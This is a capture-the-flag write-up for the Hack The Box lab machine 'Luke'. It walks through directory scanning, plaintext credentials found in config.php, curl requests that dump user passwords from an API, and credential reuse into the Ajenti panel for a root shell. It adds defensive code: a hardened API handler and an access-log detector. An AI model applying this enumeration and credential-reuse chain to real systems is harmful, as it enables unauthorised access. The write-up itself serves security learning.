HTB - Luke
Writeup for the retired HTB machine Luke
Link: https://www.hackthebox.eu/home/machines/profile/190
IP: 10.10.10.137
Recon
A quick port scan reveals multiple open ports:
21/tcp open ftp vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh?
3000/tcp open http Node.js Express framework
8000/tcp open http Ajenti http control panel
The anonymous FTP share holds a note from Derry to Chihiro, which reveals these two usernames.
Dirb scan for main
As there are multiple websites hosted, all of them are checked for subfolders and interesting files:
START_TIME: Sun Sep 1 15:04:07 2019
URL_BASE: http://10.10.10.137/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
---- Scanning URL: http://10.10.10.137/ ----
==> DIRECTORY: http://10.10.10.137/css/
+ http://10.10.10.137/index.html (CODE:200|SIZE:3138)
==> DIRECTORY: http://10.10.10.137/js/
+ http://10.10.10.137/LICENSE (CODE:200|SIZE:1093)
+ http://10.10.10.137/management (CODE:401|SIZE:381)
==> DIRECTORY: http://10.10.10.137/member/
==> DIRECTORY: http://10.10.10.137/vendor/
Dirb scan for 3000:
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
---- Scanning URL: http://10.10.10.137:3000/ ----
+ http://10.10.10.137:3000/login (CODE:200|SIZE:13)
+ http://10.10.10.137:3000/users (CODE:200|SIZE:56)
gobuster for main
As the Dirb scans above were run without file extensions, a gobuster scan configured with extensions is conducted as well:
Important: Check for extensions! (-x)
gobuster dir -u http://10.10.10.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
2019/09/01 15:58:46 Starting gobuster
===============================================================
/index.html (Status: 200)
/login.php (Status: 200)
/member (Status: 301)
/management (Status: 401)
/css (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/config.php (Status: 200)
/LICENSE (Status: 200)
Progress: 163025 / 220561 (73.91%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
This yields http://10.10.10.137/config.php, which reveals credentials:
root:Zk6heYCyv6ZE9Xcg
These credentials can be used to log in at :3000/login. The username root does not work there, but admin does:
curl -s -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' --data '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg"}' http://10.10.10.137:3000/login
The resulting token can be used to enumerate users:
curl -s -X GET -H 'Accept: application/json' -H 'Content-Type: application/json' -H 'Authorization: Bearer INSERTTOKENHERE' http://10.10.10.137:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]
By enumerating everything on port 3000, one can observe that the endpoint /users/{username} exists. So we can query every single user:
curl -s -X GET -H 'Accept: application/json' -H 'Content-Type: application/json' -H 'Authorization: Bearer INSERTTOKENHERE' http://10.10.10.137:3000/users/admin
which yields:
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}
{"name":"Yuri","password":"bet@tester87"}
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}
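The defect behind the four responses above is an API that serialises the stored user record, password included, to anyone holding a valid token. The following is an added example written for this writeup, not code from the Luke machine or the Express application running on it: it places the vulnerable response shape beside a hardened one that allow-lists public fields, plus a small check a defender can keep in a test suite. The user records and their passwords are constructed.

```javascript
// Added example, not the machine's code. User store as the API on port 3000
// appears to keep it: plaintext passwords next to the public attributes.
// All records and secrets below are constructed for this example.
const users = [
  { id: 1, name: 'Admin', role: 'Superuser',   password: 'constructed-secret-1' },
  { id: 2, name: 'Derry', role: 'Web Admin',   password: 'constructed-secret-2' },
  { id: 3, name: 'Yuri',  role: 'Beta Tester', password: 'constructed-secret-3' },
];

function findUser(name) {
  const wanted = String(name).toLowerCase();
  return users.find((u) => u.name.toLowerCase() === wanted) || null;
}

// Vulnerable pattern (what the writeup observes): the handler for
// GET /users/:name hands the password field straight to the client.
function vulnerableUserHandler(name) {
  const user = findUser(name);
  if (!user) return { status: 404, body: { error: 'not found' } };
  return { status: 200, body: { name: user.name, password: user.password } };
}

// Hardened pattern: an explicit allow-list of public fields. Anything
// added to the record later (hashes, tokens, ...) stays out of responses
// unless it is deliberately listed here.
const PUBLIC_FIELDS = ['name', 'role'];

function toPublicView(user) {
  const view = {};
  for (const field of PUBLIC_FIELDS) view[field] = user[field];
  return view;
}

function hardenedUserHandler(name) {
  const user = findUser(name);
  if (!user) return { status: 404, body: { error: 'not found' } };
  return { status: 200, body: toPublicView(user) };
}

// Regression check: no key that looks like a secret may appear in a body
// that leaves the API. Key names are matched, not values, so it also fires
// when a hash or token field is added to the record.
const SECRET_KEY_RE = /pass|secret|token|hash/i;

function leaksSecret(body) {
  return Object.keys(body).some((key) => SECRET_KEY_RE.test(key));
}

// Demonstration when run directly with node.
console.log('vulnerable:', JSON.stringify(vulnerableUserHandler('admin').body));
console.log('hardened:  ', JSON.stringify(hardenedUserHandler('admin').body));
console.log('leaks?     ', leaksSecret(vulnerableUserHandler('admin').body),
            leaksSecret(hardenedUserHandler('admin').body));
```

The allow-list is the part worth copying: a deny-list (`delete user.password`) silently stops working the moment a second sensitive column is added. The other defect the responses reveal, passwords stored in plaintext at all, is not fixed by response shaping and needs salted password hashing in the data layer.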
With these, we can try to log in to /management and find a config.json, which holds credentials as well:
root:KpMasng6S5EtTy9Z
With these credentials, one can log in to :8000 (Ajenti).
Ajenti provides a comfortable web interface for management, including a Terminal (located under Tools).
Opening that Terminal yields a root shell on the system, which can be used to print the root flag.
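Seen from the other side, the whole path above leaves two recognisable traces in web-server access logs: a burst of 404s from one client during the Dirb/gobuster phase, and one client reading every /users/{name} record in turn. The following is an added example, not part of the writeup or of the machine, that parses combined-format access log lines and applies those two rules. The log lines, client addresses and thresholds are constructed for the example.

```javascript
// Added example, not from the writeup. Constructed access-log excerpt in
// combined/common format: a directory brute-force (404 burst), the fetch
// of config.php, the token login, and the walk over /users/<name>.
const LOG = `
10.10.14.5 - - [01/Sep/2019:15:04:10 +0000] "GET /admin HTTP/1.1" 404 292
10.10.14.5 - - [01/Sep/2019:15:04:10 +0000] "GET /backup HTTP/1.1" 404 292
10.10.14.5 - - [01/Sep/2019:15:04:11 +0000] "GET /cgi-bin/ HTTP/1.1" 404 292
10.10.14.5 - - [01/Sep/2019:15:04:11 +0000] "GET /test.php HTTP/1.1" 404 292
10.10.14.5 - - [01/Sep/2019:15:04:12 +0000] "GET /old.html HTTP/1.1" 404 292
10.10.14.5 - - [01/Sep/2019:15:58:50 +0000] "GET /config.php HTTP/1.1" 200 61
10.10.14.5 - - [01/Sep/2019:16:02:10 +0000] "POST /login HTTP/1.1" 200 210
10.10.14.5 - - [01/Sep/2019:16:02:15 +0000] "GET /users HTTP/1.1" 200 162
10.10.14.5 - - [01/Sep/2019:16:02:20 +0000] "GET /users/admin HTTP/1.1" 200 43
10.10.14.5 - - [01/Sep/2019:16:02:21 +0000] "GET /users/derry HTTP/1.1" 200 44
10.10.14.5 - - [01/Sep/2019:16:02:22 +0000] "GET /users/yuri HTTP/1.1" 200 40
10.10.14.5 - - [01/Sep/2019:16:02:23 +0000] "GET /users/dory HTTP/1.1" 200 41
10.10.14.9 - - [01/Sep/2019:16:05:00 +0000] "GET /users/yuri HTTP/1.1" 200 40
`.trim();

// client ident user [timestamp] "METHOD PATH PROTO" status size
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null; // skip lines that do not match the format
  return { ip: m[1], ts: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

function parseLog(text) {
  return text.split('\n').map(parseLine).filter(Boolean);
}

// Rule 1: one client successfully reads `threshold` or more distinct
// /users/<name> records. Legitimate UI traffic touches one or two names;
// a walk over the whole user list touches all of them.
function findUserWalks(entries, threshold = 3) {
  const namesPerIp = new Map();
  for (const e of entries) {
    const m = /^\/users\/([^/?]+)$/.exec(e.path);
    if (!m || e.method !== 'GET' || e.status !== 200) continue;
    if (!namesPerIp.has(e.ip)) namesPerIp.set(e.ip, new Set());
    namesPerIp.get(e.ip).add(m[1].toLowerCase());
  }
  const hits = [];
  for (const [ip, names] of namesPerIp) {
    if (names.size >= threshold) hits.push({ ip, count: names.size, names: [...names].sort() });
  }
  return hits;
}

// Rule 2: one client produces `threshold` or more 404s, the signature of a
// wordlist-driven directory scan such as the Dirb/gobuster runs above.
function findScanBursts(entries, threshold = 5) {
  const notFoundPerIp = new Map();
  for (const e of entries) {
    if (e.status !== 404) continue;
    notFoundPerIp.set(e.ip, (notFoundPerIp.get(e.ip) || 0) + 1);
  }
  const hits = [];
  for (const [ip, notFound] of notFoundPerIp) {
    if (notFound >= threshold) hits.push({ ip, notFound });
  }
  return hits;
}

// Demonstration when run directly with node.
const entries = parseLog(LOG);
console.log('user walks :', JSON.stringify(findUserWalks(entries)));
console.log('scan bursts:', JSON.stringify(findScanBursts(entries)));
```

Both rules count per client over the whole excerpt; on real logs the counts would be kept per time window (the timestamp is already parsed into `ts`) so that a month of occasional 404s is not mistaken for a scan. The second client, 10.10.14.9, reads a single record and is correctly left alone by rule 1.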